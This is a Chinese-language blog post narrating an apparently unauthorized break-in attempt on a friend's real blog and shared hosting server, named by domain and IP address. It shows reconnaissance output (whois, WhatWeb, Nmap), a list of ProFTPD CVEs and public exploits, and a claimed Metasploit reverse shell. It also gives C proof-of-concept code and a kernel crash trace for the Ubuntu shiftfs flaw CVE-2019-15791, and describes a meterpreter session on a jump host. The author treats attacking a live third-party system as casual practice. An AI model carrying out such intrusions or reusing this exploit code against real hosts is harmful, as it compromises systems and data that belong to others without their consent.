对KIRA君的站点渗透尝试
闲着无聊,拿Kira君的博客试试手.m(_ _)m
最终失败了,主要原因是内网渗透不熟,先这样吧……公司这环境也不足够我做更多尝试了。
……万恶的内网。
用 Whois 扫描 BellSprite.com
Whois Record for BellSprite.com
Domain Profile
Registrant Whois Agent
Registrant Org Domain Protection Services, Inc.
Registrant Country us
Registrar Name.com, Inc.
IANA ID: 625
URL: http://www.name.com
Whois Server: whois.name.com
(p)
Registrar Status clientTransferProhibited
Dates 2,729 days old
Created on 2012-05-31
Expires on 2020-05-31
Updated on 2018-11-21
Name Servers NS1.DREAMHOST.COM (has 1,293,199 domains)
NS2.DREAMHOST.COM (has 1,293,199 domains)
NS3.DREAMHOST.COM (has 1,293,199 domains)
Tech Contact Whois Agent
Domain Protection Services, Inc.
PO Box 1769,
Denver, CO, 80201, us
(p) (f)
IP Address 【75.119.207.156 - 52 other sites hosted on this server】
IP Location United States - California - Brea - New Dream Network Llc
ASN United States AS26347 DREAMHOST-AS - New Dream Network, LLC, US (registered Aug 28, 2002)
Domain Status Registered And Active Website
IP History 6 changes on 6 unique IP addresses over 7 years
Registrar History 1 registrar
Hosting History 3 changes on 2 unique name servers over 7 years
Website
Website Title 认真你就输了 – kira的网络日志
Server Type 【Apache】
Response Code 200
Terms 1,399 (Unique: 877, Linked: 394)
Images 8 (Alt tags missing: 0)
Links 139 (Internal: 121, Outbound: 16)
用 Whatweb 扫描其网站 BellSprite.com
http://bellsprite.com [200 OK] Apache, Country[UNITED STATES][US],
HTML5, HTTPServer[Apache],
IP[75.119.207.156],
JQuery, MetaGenerator【WordPress 5.2.4】,
Script[text/javascript],
Title[认真你就输了 – kira的网络日志],
UncommonHeaders[link,upgrade]
用 在线Nmap 扫描75.119.207.156这个IP
75.119.207.156
apache2-heavy.caldera.dreamhost.com
21 open ftp ProFTPD 1.2.10
22 open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
80 open http Apache httpd
443 open https Apache httpd
587 open smtp Postfix smtpd
用 在线OpenVAS 扫描75.119.207.156这个IP 或者直接打开 CVE Details 查找 (ProFTPD 1.2.10)
Vulnerabilities found for Proftpd 1.2.10 (port 21/tcp )
Risk level(CVSS) CVE Summary
9 CVE-2011-4130 Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
7.1 CVE-2010-3867 Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
6.8 CVE-2010-4652 Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
5 CVE-2011-1137 Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
4 CVE-2008-7265 The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
1.2 CVE-2012-6095 ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
No vulnerabilities found for port 22
No vulnerabilities found for port 80 (missing version information)
No vulnerabilities found for port 443 (missing version information)
No vulnerabilities found for port 587 (missing version information)
在exploit搜索(Proftpd 1.2.10)发现它全系列有37个EXP,这里搜索(ProFTPD)
2015-06-10 ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) Remote Linux Metasploit
2015-04-21 ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution Remote Linux R-73eN
2015-04-13 ProFTPd 1.3.5 - File Copy Remote Linux anonymous
2009-02-10 ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection Remote Multiple AlpHaNiX
2003-09-23 ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun DoS Linux netris
2002-12-09 ProFTPd 1.2.x - 'STAT' Denial of Service DoS Linux Rob klein Gunnewiek
2001-03-15 WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion Remote Linux Frank DENIS
2000-12-20 ProFTPd 1.2 - 'SIZE' Remote Denial of Service DoS Linux JeT-Li
1999-09-17 ProFTPd 1.2 pre6 - 'snprintf' Remote Root Remote Linux Tymm Twillman
1999-08-27 ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2) Remote Linux anonymous
1999-08-17 ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1) Remote Linux babcia padlina ltd
1999-02-09 WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (2) Remote Linux jamez & c0nd0r
1999-02-09 WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (1) Remote Linux smiler & cossack
2011-12-01 FreeBSD - 'ftpd / ProFTPd' Remote Command Execution Remote FreeBSD kingcope
2010-12-03 ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) Remote Linux Metasploit
2010-12-02 ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit) Remote Linux Metasploit
2011-01-09 ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Remote Buffer Overflow (Metasploit) Remote Linux Metasploit
2011-01-09 ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit) Remote Linux Metasploit
2011-02-07 ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC) DoS Linux kingcope
2010-12-02 ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution Remote Linux anonymous
2010-11-07 ProFTPd IAC 1.3.x - Remote Command Execution Remote Linux kingcope
2009-10-12 ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow Local Unix Michael Domberg
2009-02-10 ProFTPd - 'mod_mysql' Authentication Bypass Remote Multiple gat3way
2007-08-24 ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow Remote Linux netris
2007-04-13 ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow Local Linux Xpl017Elz
2007-02-19 ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2) Local Linux Revenge
2007-02-18 ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1) Local Linux Revenge
2003-10-15 ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2) Remote Linux Solar Eclipse
2006-12-13 ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC) DoS Linux Core Security
2006-11-27 ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit) Remote Linux Evgeny Legerov
2004-10-17 ProFTPd 1.2.10 - Remote Users Enumeration Remote Linux Leon Juranic
2004-08-13 ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow Local Linux pi3
2001-01-12 ProFTPd 1.2.0 pre10 - Remote Denial of Service DoS Linux JeT-Li
2001-01-03 ProFTPd 1.2.0 rc2 - Memory Leakage DoS Linux Piotr Zurawski
2003-10-13 ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force Remote Linux Haggis
2003-10-04 ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1) Remote Linux bkbll
2003-06-19 ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection Remote Linux Spaine
在其中我选择了一个Metasploit的EXP,顺利获得反弹payload,连接成功。
但此时发现自己不是管理员权限,所以需要进行提权。
uname -a
获取服务器版本 Ubuntu 18.04 LTS
然后检查它的CVE,我的天,一堆红色10分。
因为自己之前是C++软件开发,比较擅长的是缓冲区溢出,于是顺手找了一个2019年CVE 2019-15791 进行了分析。
这个CVE核心出现在 mnt/shiftfs 文件中 shiftfs_btrfs_ioctl_fd_replace() 的一个问题。
shiftfs.c的部分伪代码如下:
function shiftfs_btrfs_ioctl_fd_replace(){
/* ... */
src = fdget(oldfd);
if (!src.file)
return -EINVAL;
ret = shiftfs_real_fdget(src.file, lfd);
/* ... */
}
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;
/* ... */
}
这个问题细节是shiftfs_btrfs_ioctl_fd_replace()函数调用了fdget()函数,然后将传回的数据直接传给shiftfs_real_fdget()函数,并做了非安全的隐式类型强转为shiftfs_file_info*。
但不同的文件系统下,file->private_data的值类型是不同的,但都会被强制转换为 shiftfs_file_info* ,这显然有一些问题,于是根据别人的经验,做了0x10的偏移,得到了下面的结构realfile,再做0x10偏移得到了vma结构的vmacache_seqnum,通过修改该值,引发了一个发生在0x4242处的内存应用释放错误。
于是伪造参数调用
int main(void) {
// 制造无效内存,目的是让vma校验 vmacache_seqnum 看起来是0x4242
for (int i=0; i<0x4242; i++) {
void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
munmap(x, 0x1000);
}
int root = open("mnt/shiftfs", O_RDONLY);
if (root == -1) err(1, "open shiftfs root");
int foofd = open("/proc/self/environ", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
// 调用
struct btrfs_ioctl_vol_args iocarg = {
.fd = foofd
};
ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
}
成功
BUG: unable to handle page fault for address: 0000000000004289
Call Trace:
shiftfs_ioctl+0x65/0x76 [shiftfs]
do_vfs_ioctl+0x407/0x670
? putname+0x4a/0x50
ksys_ioctl+0x67/0x90
__x64_sys_ioctl+0x1a/0x20
do_syscall_64+0x5a/0x130
entry_SYSCALL_64_after_hwframe+0x44/0xa9
然后制作meterpreter成功连接目标机器了,但发现这只是个跳板机……
接下来内网渗透想不到怎么办,先GG这里了。。。
学艺不精,时间不够,蛋疼~should try harder.
